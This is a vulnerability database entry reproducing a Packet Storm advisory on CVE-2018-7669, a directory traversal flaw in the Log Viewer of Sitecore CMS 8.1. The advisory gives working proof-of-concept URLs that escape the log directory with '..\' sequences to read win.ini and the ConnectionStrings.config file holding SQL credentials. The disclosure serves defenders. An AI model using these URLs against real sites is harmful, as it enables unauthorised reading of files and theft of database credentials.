Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormChris MoberlyPACKETSTORM:147367
HistoryApr 26, 2018 - 12:00 a.m.

Sitecore.NET 8.1 Directory Traversal

2018-04-2600:00:00
Chris Moberly
packetstormsecurity.com
28

0.82 High

EPSS

Percentile

98.4%

JSON
`Sitecore Directory Traversal Vulnerability  
CVE-2018-7669 (reserved)  
  
  
An issue was discovered in Sitecore CMS that affects at least  
'Sitecore.NET 8.1' rev. 151207 Hotfix 141178-1 and above. The 'Log Viewer'  
application is vulnerable to a directory traversal attack, allowing an attacker  
to access arbitrary files from the host Operating System using a  
'sitecore/shell/default.aspx?xmlcontrol=LogViewerDetails&file=' URI. Validation  
is performed to ensure that the text passed to the 'file' parameter correlates  
to the correct log file directory. This filter can be bypassed by including a  
valid log filename and then appending a traditional 'dot dot' style attack.  
  
  
[Steps to Reproduce]  
The 'Log Viewer' application renders log files from the local filesystem inside  
the web browser using a URL like the following:  
http://<website>/sitecore/shell/default.aspx?xmlcontrol=LogViewerDetails&file=  
  
  
The following URL can be used to validate the vulnerability by accessing the  
win.ini file on a Windows host (remove line breaks):  
http://<website>/sitecore/shell/default.aspx?xmlcontrol=LogViewerDetails&file=  
c%3a%5cwebsites%5c<website>%5cdata%5clogs%5<valid log file>.txt\  
..\..\..\..\..\windows\win.ini  
  
  
The following URL can be used to access the application's configuration file  
containing SQL login credentials (remove line breaks):  
http://<website>/sitecore/shell/default.aspx?xmlcontrol=LogViewerDetails&file=  
c%3a%5cwebsites%5c<website>%5cdata%5clogs%5c<valid log file>.txt\  
..\..\..\Website\App_Config\ConnectionStrings.config  
  
  
Both of the above URLs are dependent on the application's configuration and  
must be modified to correct the <website> and <valid log file> portion.  
  
  
[Additional Information]  
Vendor confirmed receipt of the vulnerability and stated a fix was in progress.  
Vendor acknowledgement: https://kb.sitecore.net/articles/356221  
  
  
------------------------------------------  
  
  
[Vulnerability Type]  
Directory Traversal  
  
  
------------------------------------------  
  
  
[Vendor of Product]  
Sitecore  
  
  
------------------------------------------  
  
  
[Affected Product Code Base]  
CMS - 8.1 and up (earlier versions untested)  
  
  
------------------------------------------  
  
  
[Attack Type]  
Remote  
  
  
------------------------------------------  
  
  
[Impact Information Disclosure]  
true  
  
  
------------------------------------------  
  
  
[Has vendor confirmed or acknowledged the vulnerability?]  
true  
  
  
------------------------------------------  
  
  
[Discoverer]  
Chris Moberly @ The Missing Link Security  
  
  
`

Related

exploitpack 1
nvd 1
checkpoint_advisories 1
prion 1
cve 1
zdt 1
cvelist 1
exploitdb 1
exploitpack
exploitpack
Sitecore.Net 8.1 - Directory Traversal
2018-08-06 00:00:00
nvd
nvd
CVE-2018-7669
2018-04-27 16:29:01
checkpoint_advisories
checkpoint_advisories
Sitecore.NET Directory Traversal (CVE-2018-7669)
2020-05-31 00:00:00
prion
prion
Directory traversal
2018-04-27 16:29:00
cve
cve
CVE-2018-7669
2018-04-27 16:29:01
zdt
zdt
Sitecore.Net 8.1 - Directory Traversal Vulnerability
2018-08-09 00:00:00
cvelist
cvelist
CVE-2018-7669
2018-04-27 16:00:00
exploitdb
exploitdb
Sitecore.Net 8.1 - Directory Traversal
2018-08-06 00:00:00

0.82 High

EPSS

Percentile

98.4%

JSON
Related for PACKETSTORM:147367
exploitpack1nvd1checkpoint_advisories1prion1cve1zdt1cvelist1exploitdb1